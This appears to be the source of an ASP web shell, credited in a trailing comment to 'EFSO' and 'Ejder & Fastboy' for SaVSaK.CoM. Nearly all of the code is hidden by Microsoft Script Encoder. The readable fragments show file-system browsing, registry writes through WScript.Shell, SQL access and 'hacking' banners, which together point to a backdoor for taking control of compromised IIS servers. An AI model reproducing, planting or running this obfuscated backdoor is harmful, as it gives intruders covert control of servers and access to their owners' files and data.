PK~k�DC9l0kP(+0s+s+~/�M+dr9kD,8EcJ#@#@&zl./KVcJ@!8@*16K,l@!J4@*~:Wws;,H[*LjD-`P0�D:m3,h�:0�x P_+2dbxk,8kMN+	~VE^Vmx[���x�"[mP-+Mr:,l.OmmlVO�MR~C&t,NC,N����,WVsl. Pz:CPkk"r	Pfm4l,3W^CzP0�DslU�y�~dm�VCDB~�W0V;~0�D:C r#@#@&@#@&;bjAPWFPEPt9*,NnxxrzKDDM.DMP4H~39G2"@#@&B~zDnV,[+�b�3nUVDrh,@#@&W	~D.KD,D+kEsnP	+aY@#@&rW,D+$;+kYR1GG3b+k`E:[[r#~',E!rPG.,D+5;/OR1GK3r/vJ:9NrbP{PEJ,PO4x@#@&7///bGU`r/mXE#~x,F@#@&i/l^V~/KW3zC.`Etmd4FEBJ4l/8JBi/Dd:9*b@#@&dZmsV,ZWKVzl.`rtC/4+r~Etmd r~4Ckt b@#@&d/l^s,ZGK3HlyvJ4C/4&E~rtCd2J~4C/4&#@#@&7ZmV^P/WGVHl"`r4lkt*EBJtCdWJStmd4cb@#@&iZl^V,/WK3zl.`E4m/tlE~rtlkXE~4lktX#@#@&iZCV^~ZKWVzmy`E4m/4vrSrtCkvr~tm/4#@#@&7ZmVs~;WW0zl.`J4CdtFJBJ4ld{r~4lk4G*@#@&7;lVs~;WG3HC.`E4lkt%r~r4lk%E~4ld4R#@#@&7ZmVV,/GW0XmycJ4Ckt1JBEtm/1EBtld4O#@#@&i/mVs,ZKW3Hl.cJ4ldt8!ESrtlkq!r~tmd4FZ#@#@&7kU%mOc,xP;qUOv/+ddbWU`rdmXE*#@#@&dbxNnmD&~',!@#@&xN,r0@#@&@#@&rUmM+s+UY~x,!@#@&kr0M+~x,JJ@#@&4ldtbUTPx,Jr@#@&TW!2'Z@#@&oYnU9'!@#@&@#@&k0,rULmDc~'~r	LnmDfPDtnU@#@&d.nkwGxknch.bYP`r@!k^DbwO@*mVn.D`JrP�:,�k0Mns+MPn�D�sN�~I*P8X,39G2]~rJ#@!&km.kaO@*Jb@#@&iD+kwKU/Rnx9`b@#@&+x9~k6@#@&i@#@&k6P1W[kUL,'EJ,Otx~v,3W[~KV;�Y!.@#@&71W9kxTP{~3KNGV!/O;M`lMCF*@#@&U[Pb0@#@&@#@&^G9kUo,xPM+2smm+c^KNrxTSr6EBJ[J#@#@&@#@&k6P[k.k~x,JJ,OtxPE~/tmDk+OPr~KV;�ED;D!XG.!:R @#@&d[k.r,'~9k.kW^EkOEM`b@#@&+U[,k0@#@&@#@&Zl^s~Cm/4sGEU[NcJ4C/4FESrtldqr#@#@&;C^V~_lktsKE	[+9`Etm/4+r~J4C/yJ#@#@&/l^V,CC/4oKEUN[`rtCd4&JSE4ld&rb@#@&/mV^PCm/4oW!x[+9`E4m/tWE~rtlk*E#@#@&;lsV~um/4sK;x9+[crtld4lJSJ4Ck*E*@#@&Zl^V,ulktoW!x[n9`J4C/4vJBE4lkvr#@#@&/C^V~CmdtwW;U9+NcE4ldtFEBJ4m/FJ#@#@&;CV^PulktoG!xN[`rtlk40JBJ4ld%Eb@#@&/l^sP_ld4wWEU[NcJ4Ckt1r~rtlk,rb@#@&ZCV^PuCktsK;x9+NvE4lkt8!E~E4m/q!rb@#@&@#@&WKDPOx8POW,r	Ln1Y8@#@&kk6.+,'~?b0.nHlDmO`1WNbUL~mDmFSNr"b#@#@&bWPklsO,'PEE,Y4+	@#@&dh9*^k'`Zzj2v:[*v/rWM+#*@#@&iD+k2Gxk+ch.kOn,/r0MnPLJ~R,J[~h9*sk,',J@!(D@*J@#@&+^d+@#@&7:9*sr{jZzj2v:Nlcdl^Y3/r0.n*#@#@&i.+kwGUk+RA.bYnPkC^YQkk6D+,[r~O,J'PsNXsbP[,E@!(D@*r@#@&+	N,kW@#@&@#@&ZCV^~tm/4z/`E4m/4FrSrtCkFr~:9*^r~kkWD#@#@&;lV^~tm/tHnd`rtm/4 ESrtC/yE~sNXsb~/rWM+b@#@&/mVs,tm/tH+kcJ4ldt2JSE4l/2E~sN*^rS/b0M+b@#@&/mVsP4C/4XndvJtCd4cE~r4m/*r~sN*^kBdk6Dn#@#@&/C^VP4C/4X+kcEtm/4*E~E4m/XJBhNlVrSkk0.n*@#@&Zms^P4m/4X+k`r4lktJBJ4CkvJBhNlVkBdr0M+*@#@&ZCs^P4lk4X/cE4l/4{r~EtmdFJSsNlVkB/bWD#@#@&;lss,tlk4X/`r4C/4%r~EtCdRJS:9XVb~dr6D+b@#@&ZCV^~4ld4X/`rtmdtOJSJ4ld1r~:9XVb~/bW.+*@#@&ZCVs~4ldtHn/vJ4CktFTEBJ4lkqZJSsNlVkB/bWD#@#@&@#@&^G9kxT~',?W	.C3bb9kh`^G9kUoBCDmFS[bykb@#@&B.+k2KxdR6VEkt@#@&x6O@#@&mG[bxo,xPM+w^C^+vmKNrxLSraE~raJ*@#@&r6PZ(UD`CDmq*P@!@*P;qxD`m.ly#QF,Y4n	@#@&Mn/aWxkn hMkD+~J@!\AK)P4OYaOn5!k\x.0.+k4,mG	YxY{JLAlbYrxT[EI`IS{vJLsk^nKlDtLJ_:G['*FLCDmFxELlDCqLJ'lMCy'ELlMl LJL[k.kxJLNr"b[JL^W9kxTxE[1W9kUo'ELhCkDrxT'E'SlkOr	o'JLr	Ln1Y8'JLk	%+1Yq[r[dC^Y'r'/mVYLE'k	LmOcxELkUL^YW[E'bxLn^D&xJLr	Ln1Y2[JE@*r@#@&x[Pb0@#@&M+/aGxk+R6s;/4@#@&@#@&Z)jAP* ,vHU/~	+/Unkk~3!s^lU�s�R,n+M:bdkKx~o�:n~mN�xm~lDY���:,8rD,l9lhN�. ,4;P	n/	+Ur	PWs[!�EUE,EUmGMV6J,NUPNrx9kh ,bDm�O�D9�:P	ns+MPHl2l.�h,NrX~'*Pr�OPo�.�U,xnV.,XCa�Vm4k^kHGDsE�;y,ib~(Ex!UVmRP!n4Et,4zP3BG2]@#@&.+kwGUk+RA.bYnPr@!Dl8^+,hk9Y4xJrFT!uJE~1Vlkd'rJ3(.O:rJ@*@!OD~-mVro	xJrYG2rJ@*@!O9P^W^dalU{Jr JrPmskTxxJrmnUD+DrE@*r@#@&DC8VK&Z`E@!8@*_l^3bUo,hrO4Pjdr	o~HU	;KGKVkPFc!,8X,2BfAI~I*@!z(@*J*@#@&HC"/KVvJ@!0G.sPCmDrW	'vELsksnhlOtLEQ:G9+{c&EPsnY4W['aWdO@*@!4@*�UN6PIn.k,),@!&4@*@!bx2ED~xm:nxEtld4yB~YH2'vD+XYB,\msE'vJLsrsnlD4[rBPkr"+{*Z@*~`�U[6rx,j+M\n.9l3r~7k.Y!C^PzDb#J*@#@&zl./GVvJ@!r	wED~YHw+{.CNbW,xC:nxEtC/4*B,m4n13+[~7lsExEYn0B@*P@!(@*zO�VmmC3,5n.=P@!J8@*@!kxa;OP	ls+xB4CktfB,OXa+xvD+6Ov,\CV!n{B[0mEVDRmdwEPdk.+xXZ@*PvP+0P4b.~XDPel" *Jb@#@&zl./GsvJ@!rUaEOPDza+xMl9kW,xmh+{B4lkt*v,\l^;+{B:!sOkE@*,@!8@*\)U?~|KUEs)~@!J4@*@!r	w;Y,Um:n{B4l/4vE~YHwn'EYnaDBP7CV!+'E wB,/byn'XT@*PcHmd/,XC2�^lmCV,NrybU*Jb@#@&HlykW^cJ@!4@*20VnU1+3,FVm/�D=~@!z(@*@!kUw;O,xC:xB4ld4lBPOza+xBDnXYv,\mVE'E4YDw[W1/wv,/k.n'y*@*,c33,|^ld�D~LbD[kkrP P~$}�P4�.C0�x~~,8bVhbXKD/mx�.bJ*@#@&XmyG.Dl`r@!k	wED~Uls+{B!�x[nM{3L|9+|Dv~7lV;n{Bel.[�MPVK�Es:Pp#,8X,2BfAIv~DXwxBkE4srOBr#@#@&.+d2Kxd+cADbYn~r@!zO[@*@!&YM@*@!zOm4^+@*@!z6GDs@*E@#@&XC"KDYmcJ@!4@*n;sVmx�s�P8X~3NNnD@!&4@*Jb@#@&Xl"dKVcJ�	n1+sb3^+~,sU6P	+dx/r~0EV^CxslNmU~4bD,NG/zCH�PSPbdYxrsxPznM+~HU	;PU/	+/bPbs+,XCy9�D�sC	l4bsk	kXK. Pw?}P[+dO�k~W^hlHlU~(kD~dD-+M~9l~(k^+~,Dm4lD�l~4!PUnkx+,zlMN�:�,rs+,k	Nn6~CDl8k^rDkkUr.RPFrsk~/.7+.^lMNlBPanDskdW	PnUT+VbU+,Yl0�s�.�y,XmNCPVsk�D�~k�bU+,or.:+zr.~~Xm[mPoUr,3E^VmU�:�,3�d�Y^�N�. ,4E	slM�Pb�t)FPb�k	P8E~U/U+HrP0EssmxN�h ,A;P	nkxn,�E,lx,VK^l^tG/DP-n,FOy~XDN~�CV��D�Pkl�s�3s�~�3rV9nR,�E~C	PK3dDPd�D�s�U9+~9kH+4bVb.ksR~jsl.�h,4E,8k.k:,2nDskkWUPxb,on�:~XKVs;sEy;~mX[�x^CD�D~	+,N+M/bUk.Pl#*P;n4E+4E#@#@&Xm"dW^`r@!8@*rU9+aPHnDbPR@*@!z4@*$!DCX�,Wbyr0/VPH+MrPIbtHz5(H,?bn(1cPWMCzl,k	Nn6rUbyrx,-kMY;C^PXn.bxrPHC	k ,|!VVmx9���U�y,sjr,Nr"bxk	nPKVl	~FrgjtjHj~zmy�UPbUN6rU,XlUrcP$E,WkW~bVPlHx�,z+MNnPb/nS,Btm^3NR4OhVEP�+.PCsDPVVmd�D9+~rk+PR@*,B R'4mmVbxTRtD:^v~,B R'R wcR-kC\kl3'AAh'tmmVkULctO:^v~Hl[C,-xnAk-4l1VbxLctD:V,ob8k,4nVbDOhxk.~oD+0 FW	EsEUE~8�HVnP(nVbDsns+xr",onDVbXGMR,BZ=-kd-k/wtmmVr	oR4O:^BPHC2Y���	�y9l~k�snsPL+M�n3^+�hn.yR ~@!4@*5z9zPdbyP�1AI�s~O@*PVE^VCU9���x�y,o?KPX!~r/D+9k�rx"r,XnD~/D-nMPNCVbP8kM~(l�Vm/,/kD+HnP1W2XmVCO�MD�/mU�y,~PB~8E,/0nD~WkW~X!~W,/rOP�yn.bNU+	~�mV��O�MD�M/l	�y,K2M:dkKx~�~m�:��PKsEM/E	;"PKPkkO+~r�bx @!J8@*r#@#@&HlydG^`E@!(@*zY�smmm3PH+M~O@*@*@!z(@*~PA|P(rD,t+9nWPb�k	R~A;.mX�[l, R'R w,�+3sr	NnPbUDn0P(+VbDDh+	k"PT+.n0kXK.Rs+/sCPERc- Rw c-rx9n6cld2EP&~[byrx,C�m��XC,k	+D,\~k	Nn6,k~CDlD,zl9lPE  -cR'R -AAS-rx9n6cld2EPPf~9k"k	~bxnMPShP9k.rxPLkM+.~BPk	[+XPk,COlMR,'bP8�z^+~rd)Hz|~"KDEU[mP P,E*@#@&Hl./W^`r@!4@*H)?UPFG	E:,~O@*@*@!J8@*P~jMNCP�GV^E~l^OP0VCd�MV+.n9+~k	[6~mYsl3,k�bUPT+sk�Dk.[b:R,vRc-Rcw R'B,�+VVrU9+~l�m��slMl~r	kx~-PP�H,db+OVDk	Pd�jYVnx9k�r~0Vlk�.P+P0C[lMPKVCx~vcRwB,r�lM+Or	kPCzmDslH�UcPh/Vl,&,[k.kUPm�l��[C,k/~sUrPKsCx,E.lVV���S~ER -c -cRwv,PXC"�	Pz+DnMNrMP{#PcP@!8@*A3s+	+^n0P3^C/�MO@*@!&8@*,4!D[l~[m~~K�s~/b+OsD+~LbDr�PHCa�V[�0NmxPkW	.l0k~|^ld�.,lN�,SPs+/sCPEhShvPzC9l~B4OYaB~zmNl~vShADKGDB~,ob4kcJ*@#@&Hl"/KVcEg+NUP(�XV~[+M/xryS~t?	Z,Uk	PV;^VlU�h�BP[+kO3sk9�kP�3bsP(�Xs+9k. ,AkMCy,3l6C~3mD��D�D�^�R~)sl~4UP9+Un9k:~L�MN�hP{b,:nsx!xP0l^[�:cP6PH�y[n	P4!~sUrP9C~XDbxrPCs9�R~�E	[l	PnhbxkhVbPVE^smx�h�	�P9+xX.+0P��.+	Nr�r	ky9n~,/k.rUNPh2.:drKx~o�h+9+~-myon�r^:nybUby~KVmml0N�M~'*PnE4+;4r#@#@&zl.WDDCcJUwl^ks~DtCx0dPDW~@!(@*?^GMVn6@!&(@*~6WMPob\bUo,k[+mPC8KEY,\?qZP;GhwKxxOJb@#@&XCyK.Ym`E@!(@*ZG[bxLPL~G+-VKw:xD~[,bsoKDrO4:/,\l9+P(z~2xfAI@!z8@*r#@#@&@#@&Zz?3~W&Pv\U/Pb�sxrHWMP'*@#@&Gx,+.DKD~./EsnP	+6D@#@&?Y,EOksd,'~?.\D /M+lOn}4%+1OvJ\U;RKKW^dJ*@#@&k6Pn.MP@!@*~!,YtU@#@&iW^:CNrcrHj; YKWsd,N+dO�k~XKVDE.,4!P/D7nD�	RE#@#@&nU9Pk6@#@&b0P4CdtWP{PEYnVrPOtU@#@&dGU,+D.GMP.+k;s+~	+XY@#@&d!Ok^/ nMW^nk/sK.:,tlk4f~,tm/4 @#@&ikWP.D,@!@*T,YtnU@#@&7dKssl[b`rAl�mD�k�"R,AnVbDOr�bxk.~\bDY!CsPalDt~VC.,NG�D!hE,+hr	PWs;	R~HU	;P[/D+�k,\m.P��	3�~/D-nMP�xcE#@#@&dsd+@#@&idGV[;vJ$l�m.N�	�y~I*Pk�snsPL+M�n0Vn�DkbRJ*@#@&7+	N~k6@#@&n^/+,@#@&KxP..WMPM+dEhn,xn6D@#@&U+O~6P'~oUr MOwWs9+M`sKV9nDhlOt*@#@&jYP6^P{P0cj;4wW^NnDd@#@&kWP.D@!@*T~Dt+U@#@&dGVsC9kcr4!P3^lk�.PPo?KPUnkx+krPbV+,OCDm:mPzl2�sm:�zWM P�	mn~K3EUhmV�SPkG	DC,HUZ,N-DXnPTk.nMRJ*@#@&xN,rW@#@&sKD~2C^4PWF,(x,0^@#@&dWU~D.WM~M+d!:Px6D@#@&i:n\0k~x,tlk4v30FcUC:_r-E_4CktX_r[+6l;sDRld2r@#@&d!ObVdcnMWm/koWM:~:\VrBPtmdty@#@&ihn\0k,'~tCd4vQ08 xm:nQr-JQ4m/4*3Ebx[6cl/aJ@#@&d!YrVkRK.Km+kdsKD:,hn\0kBP4ld4y@#@&dsn\0k~x,tld4+_WFcUm:n3J'J_4lk4*3J[+6l;sDRtDhJ@#@&d!OrVkRhDGmndksGDs~:\VrBPtCd4 @#@&ih\VbP{Ptm/4_6F xm:nQr-J34lkt*3Erx9+XR4Yhsr@#@&d!Ok^/ KMWmndksGDs~s+-0kBPtm/4+@#@&dh+73r~{Ptmdt+_08 Uls+3JwJQ4m/4*3E+NNn.ctYhsr@#@&d!ObVdcnMWm/koWM:~:\VrBPtmdtydd@#@&7:\0k~'~4m/4v3WFcxCh_JwE3tC/4X3Jr	N6R4YsE@#@&d;YbVd hDW1n/ksWMh~:\0kSP4Ckt+d@#@&db0~nMD@!@*T,Y4+	@#@&d./aWxk+cADbYnPr@!OC(V+,Ak9Yt{EEFZ!uJE@*@!OM@*@!Y9~m^ldd{JJV8MYhJr@*,J',tm/t+_6qR	lh+3JwE3tlk4*LJP@!WGxDP1WsW.x[s3Gz0c@*PHGKP)c~e"~@!6G	Y~1Vm//{JrVFrJ@*�@!J0GUD@*@!JON@*@!zD.@*@!JYm4s+@*E@#@&7+^d+@#@&7./wGUk+ hMrD+~r@!Dl4^+,Ak9Y4'rJqTZ]Jr@*@!DD@*@!O[P1Vm/d'EE04.YsEJ@*PE',tld4+_WFcUm:n3J'J_4lk4*LJ~@!6WUO,mW^GD{aZ+o/AA@*,rFPZZ,@!WW	OP1VCdk'JEV8JE@*�@!&6WUD@*@!zY9@*@!&YM@*@!zDl8s@*J@#@&dxN,rW@#@&dM+dwGUk+ 0^;/4@#@&H6Y@#@&Hl"WMOm`E@!4@*��V+sP:C:m:sl	N� ~(XPA%NDPpb@!z(@*r#@#@&nU9Pr0@#@&@#@&Z)jAPc*~E(\S_P:n~^�P9W/Hl,G3!:CR@#@&rW,kxNnmD P{~EW0J,Y4+U@#@&:n\0rP{P4Ckt @#@&Vd+@#@&s+-0k,'PwE^swmY4@#@&+U[,k0@#@&D/wKUd+chMkO+~E@!YC4^nPSk[O4'JEqZ!YJr~1VCk/{JJ04MO:rJ@*@!DD~-mVkTU'rJYK2EJ@*@!DN~mGskwCx{EJyJE~mVkLU{JEmUD+.rJ@*J@#@&Ym8VK&T`r@!8@*"+l9rxTPsbsn/,4HP;/rUTPpHduK:n~qc!P8z,2BfA],ib@!z(@*J*@#@&zl./GVvJ@!WKD:,CmDkW	xvJLsbVnnCO4[EgsGN'**EP:nO4W['aGkY@*@!k	wEDP	C:'vk	Ln^D B,-l^E+{vG3EPDX2+xv4k[NUB@*@!8@*GW/zC,b[DdbPl,@!J4@*@!k	2EDPUls+xv4l/4+B,YXanxBD+XYvP-C^En'EE[s+-Vb[Jv~kk"+{Z@*@!bxaEY,xmh+{BLWMEUO!V+|8X|2L|[m+|DEP-ls;'vR=~M�M�xO�sP) v,YzwxE/;(:bYB@*J*@#@&M+dwKxdnchDbO+,J@!JO[@*@!z6W.:@*@!JY.@*@!&Ym4sn@*J@#@&r6PUWD~bx%mD P{PrG3rPOtx@#@&HlykGVvJ@!(@*pHdC:KK@!&8@*P/Ws2W	+UO,kxr~0EsVmUslVDl9�DR,3!sVmx�h�P�K3~VKVlH PU+D7n.P9l0k~kdONr�k	ry,NGdHlx�U~6k"k0dV~^k	3Pbxb~XmyCDm3~S,k�k	rPT�D�xD�snX4bVrDdr	k"Rrb@#@&XC"kWVcE~k.PknM\nMPmPobD9rxby Pw?6~bV+,G3!:l,znY0k	k"PzG0P8kM~NbyrU9+~~Wm3CY,GMNC,NK/XmVm.Ps+-m!Y ~_KKh~�yDk	[nx,E^l�C4rsbXGD!dx!y~Wm3lO~k+.\.,k�r	NxPh2"\kk/rW	P[n	k+9~NbXWM ~W,ym:Cx~[bDn3,8EMNCU,0k"r0/nV,sbxV,k	kPHl.CDm3[l	P;sm��D��yc~A`1j,v^W	0bxLRCdaB~B1G:sWU m/wv~E/5VcCkwv,ob4k,NKdXmVCD9l~;HoE^CXmDl0~jpdP(l�slUO�^l.PHCNmP\9~PXn.^+.k	r,��Dn	+(kVbDb"R,CCYDl~)UwP0GN^lD,r�rx9+0k~b[hbx~�kMW+^+.r,ok8r,3.kDr0P�r6DM+VD9nP9l4k^R~j5SPbULmkKOUPHlal^lVdmx�"NmSP:l8sKPVC.�,~~3!s^lU��mx,/;^P0G:!VCDmNC~!Vl�m8k^kDkrUk.R,PE#@#@&Vd+@#@&D/2G	/+ AMkO+,E@!YnXYmD+mPkOX^+xBSk[O4)FZT]pt+bL4Y=cF!IB~@*r@#@&W	~+MDG.,D+d;s+~xaD@#@&U+DP+NN.P{Pj+M\n.cZDCYr4Nn^YvJtk^DGdK0ORo\S_KPKr#@#@&nNNnDc6a+U,JV2Kr~,4lkt+~,0Csk+@#@&nL9+Dcjnx9P@#@&r0~nMDx!,Otx@#@&"+/2G	/nRq.bYn,?D\DcuKtS3x1W[nv+L9nDcI+k2Gxk+:+aYb@#@&+s/@#@&M+d2Kx/n SDrY~r5C.N���	�yPmNMn/,4;V!xChmN�Pc~gQP4b.~3KxDDGV~zmw~4H~2xf3],i#E@#@&+UN,r6@#@&M+kwW	/ hMkO+,J@!&D+6DCDl@*r@#@&+	N,kW@#@&zmyGDDC`r@!8@*(XP3%9+.Ppb@!z8@*J*@#@&@#@&;)?AP**,B]nT+NbOP.�:4�MO�d�P{#,Ent;n4P8X,~P,P3~xPf~3,I~P,o,D~KPsPP,PU~l,.~?,l~F,RP;~W,H@#@&.n/aW	/nRA.bYnPr@!Ym4sn,hk[O4'EJ8TZ]ErP1Vlk/{EJ04.YsJE@*@!YD,-l^ko	xEJDWaJE@*@!O9P^W^dwmxxEr JE~mVro	xrJ^xD+DrJ@*E@#@&YC4^WfTvJ@!(@*IAM2G�P~Fc!,4zP3BG2]Ppb@!J4@*E*@#@&OC(VG&Zcr@!8M@*@!4@*"2Vr/D+.P^l.C,5b.hl,[PAVs+s+@!z8@*Eb@#@&zl.dW^`E@!6WDh~mmOkKU{BELsbV+hlD4[rghW9+x*lBPsnY4WN{2G/D@*@!kUw;O,xC:xBbx%n1Y v~7lsExEXC.B,YXa+{vtbN[+	B@*@!(@*H-3bz|z~),@!J4@*@!rUaEOP	C:'v4m/t+v,YzwxEYnXYEP\mV!n'EB~/bynxR*@*@!8D@*P`�MUn3=P_|JHwj}sPz]2'Hr^MW/GWD-jljjz|m;Wt#J*@#@&zl./GVvJ9n�DzjCV!+),@!rxaEDPUlhn{B4lk4&EP-C^E+xvEPOXan{BO6DB@*r#@#@&XmydW^`EP�MzKH2+=P@!kns+1Y,xC:nxEtC/4*B@*@!G2DkWU~7lsEx8@*]AM|?}@!zK2YbWU@*@!W2ObWx,-l^E+{+@*IAM|f	r]9@!zGwDrW	@*@!GaYkGU,\CV!n{&@*"2V{A&1z]5@!zGwDkGU@*@!WaOkKxP7CsE'W@*]2!mA(Kbg9{U}@!&KwYrG	@*@!WaObWU,\mVE'l@*IAMmH`SP(|?}@!&WaYkKU@*@!J/VnmO@*,[U4k2iLx8dai[U8kwI[	8kwI,P@!kxaED~xm:n'E?C#Ub{nmZKHB,-CV!+{B Rll,5)}G(I,)l cBPOza+xBU;(:rDB@*J#@#@&Mn/aWU/RA.bY+,E@!JYN@*@!&0KDs@*@!zO.@*@!&Ym8V@*E@#@&Xl"dKVcJ@!Om4s@*@!YD@*@!D[@*"WGY,|nz,1lsn@!JYN@*@!ON@*|mD��s���@!&O9@*@!zD.@*@!Y.@*@!YN@*un2e{;i"I3gK|j?AI@!&Y9@*@!Y9@*uF;j@!JON@*@!zD.@*@!DD@*@!ON@*un2e{d6ZzSm\zZC(HA@!&Y9@*@!Y[@*P_|StP@!&Y9@*@!zDD@*@!DD@*@!ON@*C|AemZdbU?3?m]}rP@!JON@*@!O[@*C|/]@!zON@*@!JY.@*@!DD@*@!Y9@*Cn2e{`?3]U@!zD[@*@!YN@*uF2I{`?3Ij~@!zON@*@!zDD@*@!DD@*@!O9@*u|Ae|Zi"IA1K|Z}Hs&M@!zDN@*@!DN@*_F2I{Z`]]2gK|Z61o(VP@!zD[@*@!zO.@*@!zOC(Vn@*rb@#@&zmykWVvJ"3M|?tP @*~jDDk	L`0+Vbhn#,z,I3Mm9qr]f,R@*,�xOnT+DcjmX�bPJ~"2!|A&1b"5,R@*,ArxmDz~JPIA!{A(nzH9{U},O@*P\;^YrPUODbxL~JPI3!|HiS:(|?t,O@*Pb+mzPUY.k	oEb@#@&DdwKx/ ADbYPE@!OC(VnPSrNDtxErF!TYrJ~m^Ck/xrJ04DD:rE@*@!Y.P7lsrTx'rEYKwJr@*@!Y9P1Ws/2C	'EJyEJ,lsrTx'EE1+UY.rJ@*r@#@&Yl(VKf!vJ@!4M@*@!8@*I+Tr/D+D,sCD9l	P6|i\zP'PU�JP(X~jm.?CFcZGH,I*@!&(@*r#@#@&Xm"/KVcJ@!0G.sPl1OkKx'EE'sbVnCY4'rghW9n'W*v~s+Y4G9'2WkO@*@!r	w!YP	lsn'EkULmO+EP\msE'BKV;B,YHwn'v4bN[+	v@*@!4@*\\3r&n+zP=~@!z8@*@!bxw!Y,Uls+xJrtCd4*Jr~YHw+{vO+XYEP-ls;'vB,dk.+x0l@*@!8.@*Pc�D	n0)~_|dH-UrwPzI3-tk^.K/W6O-Ul.U)F{;Wt#E#@#@&Hl"WMOlvJ@!r	wEO~7lsExEWV!B,xls+{vtm/4vEPOza+'E.l9kWE~^tm0+[@*~6nj~P ~P@!kU2!YP-C^En'EdbVv,xm:+{B4C/4vvPDX2n{BDm[kKB@*,j�JPLx(/2i'U(/2iLU4kwI'	4/2I,P@!k	2!Y~	ls+'E?m#?z{F{;W\mEP\msE'Bc l),rnj&?�J~=) RE~YHwnxE?E8hbYv@*rb@#@&./aWxk+cADbYnPr@!&O9@*@!JWWM:@*@!&OD@*@!JYC4sn@*J@#@&KUPD.GMPDnd!:nP	nXY@#@&?YPUljjlnPxPU+.-DR;.+mY+}8%+1YvJ	?^.bwORU4+^VEb@#@&drW,+.D,@!@*PT,Y4+x@#@&i7W^:CNb`EjD\.P9lPqj^DbwDRjCns^PVE^sl	�:�UC,�ykU~7+.:h3ONbDR,��VhP(l�CD�k�y ~Ul.UC|cZWtEb@#@&diDn/2G	/nRUNv#@#@&i+x[~b0@#@&bW,kUN+1Y ,',EXmyEPDtnU@#@&dKUPDDK.~D/!:nPUnXY@#@&ij+^+^O,Zldn,Z(xDc4ld4c*@#@&id;C/Pq@#@&d774l/41P{P?m#jlnR"+L.rD+~`:.ks`4Ckt bS,K.ksc4ld4&*~PrIA!{U}E#@#@&77;l/~ @#@&di74lktOPxPjCj?C|c]+T.rD+PcPMkh`4Ckt+*~,Zq	YvPDb:ctm/4f*#~,EIAM{G	6IGJ*@#@&d7/m/nP2@#@&id74m/t1~{Pjljjm| "+TDbY~`:Dr:vtCd4 #B~Z&xYvP.ks`4ldtfb*~~J"3M|A(HzI5Eb@#@&7d;Ck+~W@#@&dditmdtOPxPUl#jm|R"noqDkDn~`:Db:ctCd4 b~,PDb:c4m/tfbBPEIA!|2phbgf{U}rb@#@&d7Zm/n~l@#@&i7d4l/41~',?m.jlF "+LMrYPcPMk:c4m/4 *S,K.b:vtlkt2b~,J]2V{\idKq|j}r#@#@&73x9PU+s+^O@#@&7k6~+MD~@!@*P!~O4+U@#@&7iWssl9k`r��VhP,onD�3sn�DkDbs+s+Nb ~.zS`2~Nn�nMkUk	~NK�D;~7+P;zTEUPjC^En,obDk9�k	"k9+UP:rU,WVcE#@#@&dsd+@#@&idGV[;vJ~@!(@*J3tCd4 _E@!J4@*@!(.@*PC9D/k	+,.+TkdYD~zmy�V9� Pr#@#@&7nx9Pb0@#@&@#@&Vd+,r0,kU%mY+~{PEW0;rPO4+	@#@&ik6~tm/4v,'~EK3Er~Y4+x@#@&7dHl.W.YCcrHn\0rzn+zl,@!4@*ELK.ksc4ld4**[J@!z(@*J*@#@&diWU~DDK.PM+/!hnP	+XY@#@&77M+dwKU/RA.bY+~E@!mnxDnM@*9�+Mz.mV!n),@!8@*r@#@&7iD+k2W	/+cA.kD+,?C.jCnR]+T]+mN~c:Dkhc4ldtlb*@#@&idM+/aW	d+ch.kD+~E@!z4@*@!z1+xDn.@*r@#@&d7kW~D.@!@*TPDtnU@#@&d77KVhl9rvJFmX�DPIobdYD~VmD[C,4E^;xm:l9�  Rr#@#@&7dnU9Pr0i7@#@&dnsk+PrW,tC/4,'~r/bVJ,Y4nx@#@&7dHl"GMYlvEH\3b&F+H),@!8@*E':Dr:v4lktXbLJ@!&8@*Jb@#@&7iWU,+MDWMPMn/!:nP	+aO@#@&di4lkt,,x~?m.UlFR]nTfnVO+,`P.b:`4CktX#*@#@&d7b0,+DM@!@*TPDtnx@#@&77iWVsCNb`J"nLkkYDsl.[mx~?bsk	+hn9kR~FAX~XmU^��PG^l(kVbDc~XmNCP0lz�O,4E^Cxm:l9� E#@#@&idnVdn@#@&7diGV9EcE~l�l.�z^l~?bsbx[bR,J#@#@&i7+	N~k6@#@&7xN,r0,@#@&inUN,k6@#@&@#@&n	N~k6@#@&x[~b0@#@&zmyGDDCm`E@!4@*DbYDnx,4zPA993"P0K.PUl.UCFR;Wt@!&4@*E*@#@&@#@&@#@&A19~U2S3/:@#@&@#@&@#@&kW,wKwEaP{~smVd+,bH9,xW^r/DP',oCVk+,Y4+U@#@&Dn/aGxk+ AMkYn~r@!8D@*@!(D@*r@#@&D+kwKU/RADbYn~r@!Nb-P,/YHsn'rJ.Orx[nX)q*ZIPaWdrDkWUlm4dW^;D+Er@*r@#@&;l^sPnVC/KD6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*@!9k-~,lVrL	'EJMrTtOrJ@*J@#@&ZmsV,fG/Hl6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*J@#@&nU9PkW@#@&@#@&k6~aW2!w,'Pwl^d+,Y4+	@#@&./wKU/RhMrO+,J@!4.@*@!8M@*@!mUYD@*@!Dl4sn,mnV^2mN[bxT'Jr!rEP1+sVkwC^bxo{EJZJJ,ArNDt{JEFTrJ@*J@#@&D/2G	/+ AMkO+,E@!Y.@*@!DNP1Vmd/{JE3(DOhrJP4nkTtY{EE ZJrPdYzs'EJ(Cm0o.G!xNR^KVGD=qyF+8 rJPmVbLx{JEmxOnMJJ@*@!4@*?�D�1�snD@!z(@*@!zO[@*@!&YM@*J@#@&/C^VPj;ME^E^nM@#@&M+kwW	/ hMkO+,J@!&Dl4^n@*@!zmUO+M@*@!4.@*@!8M@*E@#@&/l^V~j!DE^;&xWW@#@&Hl"KDDllvJ@!8@*qDrYD+U~(XP@!CP4D+6xEJslbVOWlnNNnD@$dl7/CVcmWhEr@*39G3"@!&m@*,sWMP@!CP4Dn0{JE4DYw=&zShhcdC\kl0R^WhErPOlML+D'm8^lxVEr@*	hq Ul#UlnRZKH@!&l@*@!&4@*Jb@#@&Xl.GDDl`r@!8@*:+swslOn,[~Khl,fndboxn[,4zP@!C,t.0{JJslbsYK)WlkY8GH@$/m-/m3R1GhJr@*wbjK$6I@!&l@*@!4M@*j2lmrC^PPtmU0/~DW,slkY(GX@!z8@*r#@#@&xN,r0@#@&g5iqAA==^#~@%>
+<!--EFSO Ejder &  Fastboy taraf�ndan yaz�lm��t�r for SaVSaK.CoM . T�M HAKLARI Ejder e Aitttir.-->
